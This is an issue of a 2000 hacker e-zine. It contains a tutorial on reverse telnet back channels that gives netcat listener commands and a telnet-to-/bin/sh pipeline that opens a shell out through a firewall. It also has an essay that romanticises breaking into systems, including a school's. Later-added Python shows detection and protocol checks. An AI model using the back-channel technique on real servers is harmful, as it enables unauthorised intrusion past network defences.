


M a g a z i n e

-=[ Oblivion Magazine ]=-

-=[ http://www.0blivion.org ]=-

Where do you want to r00t today?

-=[ Editor: Cyber0ptix ]=-
-=[ cyberoptix@0blivion.org ]=-

-=[ Assistant Editor: Slider ]=-
-=[ Slider@0blivion.org ]=-

-=[ Writer/Advice: LockDown ]=-
-=[ lock-down@hushmail.com ]=-

Ripping Up Sanity For The Masses

-=[ IRC: #OBLIVIONMAG on EFNet ]=-


Designed in pico

-=[ Issue 8 - 15/10/2000 ]=-

-=[ Contents ]=-

--------------------------------------- -----------------
[ Articles                            ] [ Author        ]
+-------------------------------------+ +---------------+
[ Contents                            ] [ 0blivion.org  ]
[ Introduction To Issue 8             ] [ Cyber0ptix    ]
[ Rant                                ] [ Slider        ]
[ Reverse Telnet/Back Channels        ] [ Dysphunktion  ]
[ Mobile IP                           ] [ Slider        ]
[ Business Opportunities              ] [ 0blivion.org  ]
[ Wireless Applications Protocol      ] [ Slider        ]
[ Why Hack?                           ] [ Illusion      ]
[ End Credits                         ] [ 0blivion.org  ]
--------------------------------------- -----------------


Introduction to Issue 8 - Cyber0ptix

Welcome to issue 8, well yeah it's a little bit late, but better late than
never hey, and at least we haven't died. Well the main reason for it being
late is lack of articles and time. Me and Slider have been busy this
month and didn't really have enough time to be writing articles all
month. Well we got a few from you, our readers, and these have been
included in the issue. Remember, if you ever fancy writing a little
article or text, on any subject then send it in and we'll try and include
it in 0blivion, what's the worst that could happen? We could say no and
laugh at you in the editorial, but I'm sure we won't.

Well not a lot has happened this month, I've mainly been working and trying
to get promoted, which should be happening soon ;o) Also been back at uni
for a nice and steady 1 hour week ;o) ahh the joys of being a part time
student with a full time job, even managed to get finance to buy a new
computer which should be here next week ;o)


Slider's little rant - Slider

Wazzzzzzzzzzzzzzzzzzup? This month has mostly been spent shouting this word
across pubs/clubs/and streets, because of those ruddy Budweiser adverts
and their spin-offs.

What else have I been up to, well my life has taken a turn for the better! My
job is top value and life couldn't be better! I have a nice car, more money
than ever, but no girl friend.. heh! What do I need one of them
for? Constant sex, loving relationship, commitment.. erk! Hang on, what am
I saying??? I'm a computer geek!, all I need is a shell account, BitchX and
#sex on EFNet.

Anyways, writing text files has kinda taken a back seat for me at the
moment, I am more interested in sleeping.. no honestly, I don't have much
time anymore, I spend most of the time on the road and doing courses, this
will settle down soon and I will be writing text files as before... This
month I had only written one article for 0blivion, and until Cyber sent me
a text message saying that he did not have enough articles, I had to write
one the same night/day..

So, guys/gals where the hell are your articles??? 0blivion only exists if we
get articles and text files. So, if anyone has any texts/articles that
they have written and would like them published, then send it into
us. Or, if you have any ideas for text files or an article then give us a
shout, and we would be v. much happy to check it out and help you out in

Thanks to any of you that have supplied articles, and please keep on pumping
it out, we very much want your help and articles to keep on pushing
0blivion further. Also, thanks to any of you that have supplied feedback
on 0blivion, we have taken this into consideration and actioned your
questions/answers/points of view.

Also, if you are interested Hants 2600 is going to blow off again very soon
if anyone is interested in joining in.

Many thanks.

- Slider


Reverse Telnet/Back Channels - dysphunktion

This is a fairly short text on the principles behind reverse telnet and back
channel attacks.

First we must set up a scenario for our telnet sessions to take place in.
Imagine the server that you want access to is behind a standard packet
switching firewall which only allows inbound connections to ports 80
(HTTP) and 443 (HTTPS). This is quite often what you find, and without
other points of access these ports will have to be used.

Now in order to use a back channel / reverse telnet you first need to have
identified a vulnerability already on the server that allows you to execute
commands on that server. An example of this would be the ever famous but
now obsolete PHF exploit, but any exploit that lets you execute commands is
just as usable. PHF is the example exploit used in this text purely because
it is well known, so the theory of back channels / reverse telnet can be
followed easily without having to worry about how the exploit is working.

So we have identified an exploit, but because of the firewall we can't connect
to any port other than 80 and 443. To start finding anything juicy on the
server we need to get access via telnet, but with the firewall in place we
cannot connect to port 23, so it seems we are a bit buggered. But wait a sec:
the firewall will let the server telnet out to other systems, so if we could
sweet talk the server into telnetting us then we could get a telnet
connection to the server through the firewall without a problem (assuming of
course telnet is installed on the server, which it is in almost all default
installs).

To start a reverse telnet session (a telnet session that originates at the
server end rather than your PC) we need to use netcat (how would we cope
without it!!). We need to get it listening on port 80 and another port. This
other port could be any port, but it has to be one that the firewall lets by
on outbound traffic (21, 25 etc etc, just trial and error until ya get one).
The commands for getting netcat to listen on these ports are:

nc -l -vv -p 80
nc -l -vv -p 21

Once we have netcat listening we have to initiate the reverse telnet by
using the exploit we identified earlier. In our example PHF the command
would be:


What this does is as follows:

/bin/telnet your_ip_address 80
    This connects to your PC on port 80 (which netcat is listening on).
    This is the telnet screen that you will type the commands you want
    executed in.

| /bin/sh
    This pipes the output from the previous telnet screen into the shell
    of the server.

| /bin/telnet your_ip_address 21
    The results of the commands we executed via the first telnet screen
    are piped into a new telnet screen that comes to our computer on
    port 21, which the firewall allows through.

Bang there you go, you have telnet on the server even though the firewall
wouldn't let you connect to the server in the standard way, from here it's
up to you what you do! Depending on the binaries that are on the target
server all sorts of back channels can be created, not just telnet but things
like xterm as well (nice if you can find it).
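
From the defending side, the back channel described above has a clear network signature: a server that should only answer inbound requests starts two outbound connections to the same remote host on different ports. The following is an added example, not part of the original article; the record format, addresses and allow-list are constructed for illustration. A default-deny egress policy on the firewall removes the technique entirely, and this check finds the cases where that policy is missing.

```python
from collections import defaultdict

# Constructed connection-initiation records: "epoch initiator responder dport"
SAMPLE_FLOWS = """\
1000 198.51.100.7 10.0.0.5 80     # normal inbound web request
1002 10.0.0.5 198.51.100.7 80     # server dials out (command channel)
1003 10.0.0.5 198.51.100.7 21     # server dials out again (output channel)
1100 10.0.0.5 10.0.0.53 53        # DNS to the internal resolver, allowed
1200 203.0.113.9 10.0.0.5 443     # normal inbound HTTPS request
1300 10.0.0.5 192.0.2.44 25       # lone outbound connection
"""

SERVERS = {"10.0.0.5"}            # hosts that should never initiate sessions
ALLOWED = {("10.0.0.53", 53)}     # (destination, port) pairs they may use


def parse_flows(text):
    """Parse the constructed record format into sorted (ts, src, dst, dport)."""
    flows = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ts, src, dst, dport = line.split()
        flows.append((float(ts), src, dst, int(dport)))
    return sorted(flows)


def egress_violations(flows, servers, allowed):
    """Every connection a protected server initiated outside the allow-list."""
    return [f for f in flows if f[1] in servers and (f[2], f[3]) not in allowed]


def back_channels(flows, servers, allowed, window=60.0):
    """Flag a server opening 2+ distinct ports to one remote within `window` s."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport in egress_violations(flows, servers, allowed):
        by_pair[(src, dst)].append((ts, dport))
    alerts = []
    for (src, dst), conns in sorted(by_pair.items()):
        for i, (start, _) in enumerate(conns):
            ports = {p for t, p in conns[i:] if t - start <= window}
            if len(ports) >= 2:
                alerts.append((src, dst, tuple(sorted(ports))))
                break
    return alerts


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    for src, dst, ports in back_channels(flows, SERVERS, ALLOWED):
        print(f"possible back channel: {src} -> {dst} ports {ports}")
    for ts, src, dst, dport in egress_violations(flows, SERVERS, ALLOWED):
        print(f"unexpected egress at {ts:.0f}: {src} -> {dst}:{dport}")
```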


Mobile IP - Slider

- Mobile IP

In the DHCP and DDNS environment, DHCP provides a device with a valid IP
address for the point at which it is attached to the network. DDNS provides
a method of locating that device by its host name, no matter where that
device happens to be attached to a network and what IP address it has been

An alternative approach to the problem of dealing with mobile devices is
provided in RFC 2002 IP Mobility Support. IP Mobility Support, commonly
referred to as Mobile IP, is a proposed standard.

-- Mobile IP Overview

Mobile IP allows a device to maintain the same IP address (its home
address) wherever it attaches to the network. (Obviously, a device with an
IP address plugged into the wrong subnet will normally be
unreachable.) However, the mobile device also has a care-of address,
which relates to the subnet where it is currently located. The care-of
address is managed by a home agent, which is a device on the home subnet
of the mobile device. Any packet addressed to the IP address of the mobile
device is intercepted by the home agent and then forwarded on to the care-of
address through a tunnel. Once it arrives at the end of the tunnel, the
datagram is delivered to the mobile device. The mobile node generally uses its
home address as the source address of all datagrams that it sends.

Mobile IP can help resolve address shortage problems and reduce administrative
workload, because each device that needs to attach to the network at
multiple locations requires a single IP address only.

The following terminology is used in a mobile IP network configuration:

* Home Address
The static IP address allocated to a mobile node. It does not change no
matter where the node attaches to the network.

* Home Network
A subnet with a network prefix matching the home address of the mobile
node. Datagrams intended for the home address of the mobile node will
always be routed to this network.

* Tunnel
The path followed by an encapsulated datagram.

* Visited Network
A network to which the mobile node is connected, other than the node's
home network.

* Home Agent
A router on the home network of the mobile node that maintains current
location information for the node and tunnels datagrams for delivery to
the node when it is away from home.

* Foreign Agent
A router on a visited network that registers the presence of a mobile node
and detunnels and forwards datagrams to the node that have been tunneled
by the mobile node's home agent.

-- Mobile IP Operation

Mobility agents (home agents and foreign agents) advertise their presence on the
network by means of agent advertisement messages, which are ICMP router
advertisement messages with extensions. A mobile node may also explicitly
request one of these messages with an agent solicitation message. When a
mobile node connects to the network and receives one of these messages, it is
able to determine whether it is on its home network or a foreign network. If
the mobile node detects that it is on its home network, it will operate
normally, without the use of mobility services. In addition, if it has
just returned to the home network, having previously been working elsewhere,
it will deregister itself with the home agent. This is done through the
exchange of a registration request and registration reply.

If, however, the mobile node detects from an agent advertisement that it has
moved to a foreign network, then it obtains a care-of address for the foreign
network. This address may be obtained from the foreign agent (a foreign
agent care-of address, which is the address of the foreign agent itself),
or it may be obtained by some other mechanism such as DHCP (in which case it is
known as a co-located care-of address). The use of co-located care-of
addresses has the advantage that the mobile node does not need a foreign
agent to be present at every network that it visits, but it does require
that a pool of IP addresses is made available for visiting mobile nodes by
the DHCP server.

Note that communication between a mobile node and a foreign agent takes place
at the link layer level. It cannot use the normal IP routing mechanism,
because the mobile node's IP address does not belong to the subnet in which it
is currently located.

Once the mobile node has received its care-of address, it needs to register
itself with its home agent. This may be done through the foreign agent, which
forwards the request to the home agent, or directly with the home agent.

Once the home agent has registered the care-of address for the mobile node in
its new position, any datagram intended for the home address of the mobile node
is intercepted by the home agent and tunneled to the care-of address. The tunnel
endpoint may be at a foreign agent (if the mobile node has a foreign agent
care-of address), or at the mobile node itself (if it has a co-located care-of
address). Here the original datagram is removed from the tunnel and delivered
to the mobile node. The mobile node will generally respond to the
received datagram using standard IP routing mechanisms.

-- Mobile IP Registration Process

RFC 2002 defines two different procedures for mobile IP registration. The mobile
node may register via a foreign agent, which relays the registration to the
mobile node's home agent, or it may register directly with its home agent. The
following rules are used to determine which of these registration
processes is used:

* If the mobile node has obtained its care-of address from a foreign agent,
it must register via that foreign agent.

* If the mobile node is using a co-located care-of address, but has received
an agent advertisement from a foreign agent on this subnet, which has
the R bit (registration required) set in that advertisement, then it
should register via the agent. This mechanism allows for accounting to
take place on foreign subnets, even if DHCP and co-located care-of address
is the preferred method of address allocation.

* If the mobile node is using a co-located care-of address but has not
received such an advertisement, it must register directly with its home

* If the mobile node returns to its home network, it must (de)register
directly with its home agent.

The registration process involves the exchange of registration request and
registration reply messages, which are UDP datagrams. The registration
request is sent to port 434.

-- Tunneling

The home agent examines the destination IP address of all datagrams arriving on
the home network. If the address matches with any of the mobile nodes
currently registered as being away from home, then the home agent tunnels
(using IP in IP encapsulation) the datagram to the care-of address for that
mobile node. It is likely that the home agent will also be a router on the
home network. In this case it is likely that it will receive datagrams
addressed for a mobile node that is not currently registered as being away
from home. In this case, the home agent assumes that the mobile node is at
home, and forwards the datagram to the home network.

When a foreign agent receives a datagram sent to its advertised care-of
address, it compares the inner destination address with its list of
registered visitors. If it finds a match, the foreign agent forwards the
decapsulated datagram to the appropriate mobile node. If there is no match,
the datagram is discarded. (The foreign agent must not forward such a
datagram to the original IP header, otherwise a routing loop will occur.)

If the mobile node is using a co-located care-of address, then the end of the
tunnel lies at the mobile node itself. The mobile node is responsible for
decapsulating the datagrams received from the home agent.
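
The two sides of the tunnel described above, as an added example that is not part of the original article. It assumes IPv4 headers without options and IP-in-IP encapsulation as protocol number 4; the addresses, the binding table and the function names are constructed for illustration.

```python
import socket
import struct

IPPROTO_IPIP = 4     # IP-in-IP encapsulation
IPPROTO_UDP = 17

HOME_AGENT = "10.1.0.1"                   # constructed addresses
BINDINGS = {"10.1.0.7": "192.0.2.1"}      # home address -> care-of address


def checksum(header):
    """Internet checksum over an IPv4 header (returns 0 for a valid header)."""
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def ipv4(src, dst, proto, payload):
    """Build a 20-byte IPv4 header (no options) in front of `payload`."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64,
                      proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:] + payload


def parse(packet):
    """Validate an IPv4 header and return its routing-relevant fields."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 datagram")
    ihl = (packet[0] & 0x0F) * 4
    total_len = struct.unpack("!H", packet[2:4])[0]
    if ihl < 20 or total_len < ihl or total_len > len(packet):
        raise ValueError("bad length fields")
    if checksum(packet[:ihl]) != 0:
        raise ValueError("bad header checksum")
    return {"proto": packet[9],
            "src": socket.inet_ntoa(packet[12:16]),
            "dst": socket.inet_ntoa(packet[16:20]),
            "payload": packet[ihl:total_len]}


def home_agent_forward(datagram, bindings, home_agent):
    """Tunnel to the care-of address if the node is registered as away."""
    care_of = bindings.get(parse(datagram)["dst"])
    if care_of is None:
        return "local", datagram          # node assumed to be at home
    return "tunnel", ipv4(home_agent, care_of, IPPROTO_IPIP, datagram)


def foreign_agent_receive(packet, care_of, visitors):
    """Decapsulate; deliver only to registered visitors, otherwise discard."""
    try:
        outer = parse(packet)
        if outer["dst"] != care_of or outer["proto"] != IPPROTO_IPIP:
            return None
        inner = parse(outer["payload"])
    except ValueError:
        return None
    if inner["dst"] not in visitors:
        return None                       # discard, never re-forward (loop)
    return inner["dst"], outer["payload"]


if __name__ == "__main__":
    dg = ipv4("198.51.100.20", "10.1.0.7", IPPROTO_UDP, b"hello")
    action, pkt = home_agent_forward(dg, BINDINGS, HOME_AGENT)
    print(action, foreign_agent_receive(pkt, "192.0.2.1", {"10.1.0.7"}))
```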

-- Broadcast Datagrams

If the home agent receives a broadcast datagram, it should not forward it to
mobile nodes unless the mobile node specifically requested forwarding of
broadcasts in its registration request. In this case, it will forward the
datagram in one of the following manners:

* If the mobile node has a co-located care-of address, the home agent simply
encapsulates the datagram and tunnels it directly to the care-of address.

* If the mobile node has a foreign agent care-of address, the home agent first
encapsulates the broadcast in a unicast datagram addressed to the home
address of the node. It then encapsulates and tunnels this datagram to the
care-of address. In this way the foreign agent, when it decapsulates the
datagram, knows to which of its registered mobile nodes it should forward
the broadcast.

-- Move Detection

Mobile IP is designed not just for mobile users who regularly move from one
site to another and attach their laptops to different subnets each time,
but also for truly dynamic mobile users (for example, users of a wireless
connection from an aircraft). Two mechanisms are defined that allow the
mobile node to detect when it has moved from one subnet to another. When
the mobile node detects that it has moved, it must re-register with a
care-of address on the new foreign network. The two methods of move
detection are as follows:

1. Foreign agents are consistently advertising their presence on the network by
means of agent advertisements. When the mobile node receives an agent
advertisement from its foreign agent, it starts a timer based on the
lifetime field in the advertisement. If the mobile node has not
received another advertisement from the same foreign agent by the time the
lifetime has expired, then the mobile node assumes that it has lost
contact with that agent. If in the meantime it has received an
advertisement from another foreign agent, it may immediately attempt
registration with the new agent. If it has not received any
further agent advertisements, it should use Agent solicitation to try and
locate a new foreign agent with which to register.

2. The mobile node checks whether any newly received agent advertisement is on
the same subnet as its current care-of address. If the network prefix is
different, the mobile node assumes that it has moved. On expiry of its
current care-of address, the mobile node registers with the foreign agent
that sent the new agent advertisement.

-- Returning Home

When the mobile node receives an agent advertisement from its own home agent,
it knows that it has returned to its home network. Before deregistering with the
home agent, the mobile node must configure its routing table for operation on
the home subnet.

-- ARP Considerations

Mobile IP requires two extensions to ARP to cope with the movement of mobile
nodes. These are:

* Proxy ARP
An ARP reply sent by one node on behalf of another that is either unable
or unwilling to answer ARP requests on its own behalf.

* Gratuitous ARP
An ARP packet sent as a local broadcast packet by one node that causes all
receiving nodes to update an entry in their ARP cache.

When a mobile node is registered as being on a foreign network, its home agent
will use proxy ARP in response to any ARP request seeking the mobile node's
MAC address. The home agent responds to the request giving its own MAC

When a mobile node moves from its home network and registers itself with a
foreign network, the home agent does a gratuitous ARP broadcast to update the
ARP caches of all local nodes on the network. The MAC address used is again the
MAC address of the home agent.

When a mobile node returns to its home network, having been previously
registered at a foreign network, gratuitous ARP is again used to update ARP
caches of all local nodes, this time with the real MAC address of the
mobile node.

-- Mobile IP Security Considerations

The mobile computing environment has many potential vulnerabilities with regard
to security, particularly if wireless links are in use, which are particularly
exposed to eavesdropping. The tunnel between a home agent and the care-of
address of a mobile node could also be susceptible to interception, unless a
strong authentication mechanism is implemented as part of the registration
process. RFC 2002 specifies implementation of keyed MD5 for the
authentication protocol and advocates the use of additional mechanisms (such as
encryption) for environments where total privacy is required.
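
How a home agent can check the keyed MD5 authenticator before accepting a new care-of address, as an added example that is not part of the original article. The field layout (Registration Request type 1, Mobile-Home Authentication Extension type 32, digest over key + protected fields + key) follows RFC 2002; the key, SPI and addresses are constructed, and the request is assumed to carry no other extensions.

```python
import hashlib
import hmac
import socket
import struct

REG_REQUEST = 1       # Registration Request message type
MH_AUTH_EXT = 32      # Mobile-Home Authentication Extension type
FIXED_FMT = "!BBH4s4s4sQ"   # type, flags, lifetime, home, agent, care-of, id
FIXED_LEN = struct.calcsize(FIXED_FMT)   # 24 bytes
AUTH_LEN = 16         # MD5 digest size

KEYS_BY_SPI = {0x100: b"constructed-shared-secret"}   # security associations


def keyed_md5(key, protected):
    """RFC 2002 default authenticator: MD5 in prefix+suffix mode."""
    return hashlib.md5(key + protected + key).digest()


def build_request(key, spi, home, home_agent, care_of, lifetime, ident):
    """Mobile node side: fixed fields, extension header, then authenticator."""
    fixed = struct.pack(FIXED_FMT, REG_REQUEST, 0, lifetime,
                        socket.inet_aton(home), socket.inet_aton(home_agent),
                        socket.inet_aton(care_of), ident)
    ext = struct.pack("!BBI", MH_AUTH_EXT, 4 + AUTH_LEN, spi)
    return fixed + ext + keyed_md5(key, fixed + ext)


def verify_request(packet, keys_by_spi):
    """Home agent side: return the binding, or raise ValueError."""
    if len(packet) != FIXED_LEN + 6 + AUTH_LEN or packet[0] != REG_REQUEST:
        raise ValueError("not a bare registration request")
    ext_type, ext_len, spi = struct.unpack(
        "!BBI", packet[FIXED_LEN:FIXED_LEN + 6])
    if ext_type != MH_AUTH_EXT or ext_len != 4 + AUTH_LEN:
        raise ValueError("missing Mobile-Home Authentication Extension")
    key = keys_by_spi.get(spi)
    if key is None:
        raise ValueError("unknown SPI")
    protected, received = packet[:-AUTH_LEN], packet[-AUTH_LEN:]
    # Constant-time comparison so the check does not leak digest bytes.
    if not hmac.compare_digest(keyed_md5(key, protected), received):
        raise ValueError("authentication failed")
    _, _, lifetime, home, _, care_of, ident = struct.unpack(
        FIXED_FMT, packet[:FIXED_LEN])
    return {"home": socket.inet_ntoa(home),
            "care_of": socket.inet_ntoa(care_of),
            "lifetime": lifetime, "ident": ident}


def is_authentic(packet, keys_by_spi):
    """Boolean wrapper around verify_request."""
    try:
        verify_request(packet, keys_by_spi)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    pkt = build_request(KEYS_BY_SPI[0x100], 0x100, "10.1.0.7", "10.1.0.1",
                        "192.0.2.10", 300, 1)
    print(verify_request(pkt, KEYS_BY_SPI))
    # A rewritten care-of address (bytes 12..15) would redirect the tunnel.
    forged = pkt[:12] + bytes([203, 0, 113, 66]) + pkt[16:]
    print("forged request accepted:", is_authentic(forged, KEYS_BY_SPI))
```

RFC 3344, which later replaced RFC 2002, changed the default authenticator to HMAC-MD5.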

RFC 2002 can be located doing a search on your fave. search engine.



Business Opportunities - 0blivion.org

After deciding that 0blivion.org needed a financial investment to enable
us to compete in the ever increasing market of information security we
scoured the internet to find the best money making opportunities we
could. We are planning on making a small investment and want a very large
return for our money. Well we think we may have found the business
opportunity, and because of the potential of this business plan we have
decided to share this with you the readers. This is a real email which we
received, if you want to own your own business then please feel free to
get in touch with them just like we did and within 2 months you could be a
multi millionaire just like us ;o)

Dear Sir/Madam,
We obtain your name from internet. We are looking for the "Automatic
cap-opening dustbin" importers, distributors or agent in your area. The
detail information of the dustbin is listing below. Attached file is the
picture of "Auto-opening dustbin" It would be much appreciated if you
can forward this information to your members or someone who may be
interested in these products.

For further more information, please contact us:
Ninestars Group
Tel: (86)591-7562088
Fax: (86)591-7508258
Address: Room 2401, B district Jinyuan Garden, 328 north 61 road,
Fuzhou, China.
Postcode: 350001

Thank you and best regards,
Mr. Shi hongxiang
Marketing department

A Brief Introduction of Electronic Inductive Automatic Cap-opening

When you are opening the cap of a dustbin now sold in the market, you
have to touch with your hand or tread with your foot over the dustbin.
It is very inconvenient, besides also much worse, you have a possibility
of bacterial infection. But now, with delicate research, our company
firstly invents a kind of automatic cap-opening dustbin based on infra
red ray induction in the world. When your hand or some other objects are
only about 15cm away from the induction window of the dustbin, the cap
of the dustbin will open automatically. After the rubbish has been
thrown into the dustbin, the cap will close automatically. You and
objects need not contract with the dustbin. This product is controlled
by computer chips and is consisted of infra red detecting device
together with mechanical and electrical drive system. It is a high-tech
product, a combination of machine-light-electricity technique. It also
has many advantages, such as high performance, longer life than common
dustbin in serving, low energy consuming and so on.


1.Open the cover of the battery case at the bottom of the induction dustbin.
And equipped it with four batteries. Don't wrong-side the negative and the
positive pole.

2.Open the power switch at the behind of the dustbin. At this moment, the red
indicator lamp will be on for 3seconds.Then it will flash every 2 seconds,
which shows that the circuit is now in normal working condition.

3.When you're going to throw rubbish into it, only keep the objects or your
hand about 15cm high above the induction window (in vertical direction). The
cap will automatically open within 0.5 second. After throwing the rubbish
into the dustbin, the cap will automatically close about 3 seconds when you
put your hand away from the induction window.

4.Press the button that is on the left of the induction window (cap which can
be opening only by hand) the cap opens automatically but it cannot close
automatically. If you close it, you have to press the on-the-right-side
button. Press the on-the-right-side button. Again, the circuit will be in the
automatic process.

(1) The indicator lamp in the normal waiting state flashes red (once every 2

(2) When the cap is automatically open, the indicator lamp is continuously

(3) In the process of automatically closing, the indicator lamp is
continuously yellow.

(4) While the cap is opened by hand, it turns to flash green (once every 2

6.When the battery is going to be used up, the indicator turns to flash yellow.
Suppose you use the dustbin 20 times each day, the batteries can also be used
for nearly 6 months. Since this product is equipped with electronic units.
You cannot wash the dustbin with the dustbin with water. If it is dirty,
you can clean it with a wet cloth.


Wireless Applications Protocol - Slider

WAP - Wireless Application Protocol

Imagine driving down the motorway at 120mph while reading your email.. not
possible you say.

Well, you lie..! Thanks to WAP (Wireless Application Protocol) it is now
possible to do this, it is also possible to read the reviews of movies
while standing in the queue at the video store over your mobile phone.

- WML and WAP

Hopefully you are all familiar with HTML language used to make Web pages.
After you write an HTML page, you save it with an .HTML file extension, and
then you place it in a specific folder of your Web box. When people want
to access your page they type


The server sends the tags from your HTML file back to the browser, which
renders them on the screen. This request and response is called the
Hypertext Transfer Protocol (HTTP).

Wireless Markup Language (WML) works along the same lines as HTML, except
that it is for small screens and low refresh rates/graphic details. You
create a WML page in a text editor, and save it with a .WML file
extension, much like the HTML based document.

Below is an example of WML in action.

<?xml version="1.0"?>
<!DOCTYPE wml PUBLIC "-0blivion.org tekniq 1.1//EN"

The example is a very basic WML based page, that displays a title and a

Wireless Application Protocol (WAP) is the protocol that allows mobile
phones and other wireless devices to connect to the Internet.

You might be wondering why WML and WAP are even needed. Why not stay with
HTML and HTTP, which is universally available?

Some mobile devices do. But to really take advantage of what wireless
networks and mobile devices have to offer, WML and WAP are necessary to get
around the limitations of the technology: for example, mobile devices have
less powerful CPUs, less memory, smaller displays, and limited input
capabilities.

Wireless data networks also have less bandwidth, less predictable
availability, and less connection stability than the typical home or
office network.

- Publishing WML

If you have a Web server installed on your own computer, you can test your
WML file pretty easily. But first, you have to configure your Web server
so that it understands WML decks and their MIME type. I use the Apache
HTTP Server, so to make this configuration change, I
had to edit the httpd.conf file and add the following line:

AddType text/vnd.wap.wml wml

If you use the IBM HTTP Web server, just add it to the same file. If you use
Netscape, IIS, or another server, then consult the server's documentation to
find out what changes to make. If you are hosted by someone else, then ask
them about enabling WAP.

[Cyber0ptix - Alternatively you can enable it yourself on a box by simply
adding the line to a .htaccess file and placing it in the folder you are
serving WML files from.]

You can download WML browsers from Phone.com, Nokia, Ericsson, Slob Trot,
and a few other places.

Once you've got a browser installed, you can just enter the URL for your WML
deck, just as you would in an ordinary browser, such as


- Resources/links

To find out more about WAP and how to write it then look at


For more information and announcements, check out




Why Do we hack? - Illusion

Why do we hack?

Why? The big question. Why do we, as a hacker community, hack? It has
given thousands an undeserved bad name and put thousands in jail. Yet we
persist. We continue this insane crusade of hacking!! I will incite you,
as a hacker, and others, from the non hacking community, into the mind of a

It starts in grade school. We all started with something. For some it was
an apple II and yet for others it was DOS 5.x with win 3.1 installed over
it. No one knew anything. All we did was play games or browse folders.
Then came the internet. Holy shit! I can talk to people across the world!
I can be whoever / whatever I want to be. All I have to do is type! Then I
heard of a hacker. Now what's this. A hacker...at that time "hacker"
wasn't such a bad name. It was still mainly used for programmers who
"hack" at code until it's perfect. I didn't know who or what a hacker was,
all I knew was that it sounded interesting.

It started with simple script kiddy stuff. Your basic sub7 or your simple
virii. This didn't take much. All I would do is take the disk to the
target.....plug it in and presto. Go home and I can access their comp.
Ahhhh......real elite. Then you read. I think all hackers are born good
readers. You read about programs called telnet and ftp. What's this? I
can do all this stuff without having to pop in a disk? Wow. You start
playing around with these tools. You learn about ports and their
weaknesses. You learn about basic password cracking and finding ways around
them. It's still real simple stuff.

Then comes the glory. You crack your first system. Everyone can remember.
It's a thrill of a lifetime. I remember calling my friend and telling him
how I did it. It was my school. We had lots of fun with that school.
Learning more and more each time you signed online.

I think that's why we do it. Why we commit ourselves to do this crime. I
have talked to a countless number of hackers and they all agree. Some
people say it's the quest for knowledge. And yes I agree. It is. I always
love learning something new and then trying it out. Everyone has been
there. Staying up till 2 AM so you can finish reading the article.

I hope that this has shown a little bit into a hacker's mind. For a hacker
is misunderstood. No one is out there to be malicious and cruel but they
are out there for the thrill and the knowledge. With this I hope that you
understand the hacker better......for it is not us that is the criminal but



\____ 0wning The World Is A Slow Process,So Give Up And Let Us Gain R00t On You

#OblivionMag EFNet
Copyright 0blivion.org 2000
B0w Down And Feer The Revolution Of Oblivion
Designed On 800x600 Resolution
Sponsors : http://www.slidersecurity.co.uk
Music : Green Velvet - Flash 'Cameras ready, prepare to flash!!'
Drink : Anything, preferably strong ;o)
Thanks : Vortex, For hosting 0blivion.org
Abattis and Gossi for re-hosting 0blivion.org
Lockdown, kermit and Omega for their work.
Atomix for his Bot's on #oblivionmag
Spammy for his Bot's on #oblivionmag
My new dealer for provider me with quality skunk ;o)
Gatecrasher/Bed in sheffield for two tops nights
Aleph1, R.F.P and all the h0es that make our lives worth living
online And Akt0r, DC_`, d0tslash, Cl0wn, TNC, redmang, Slinkie and
a few others #darkcyde, #bellcrew, #2600-uk, #bifemunix, #hax0r,
#b10z, #beyond, #japan
Woman : Rachel, S club 7 babe ;o)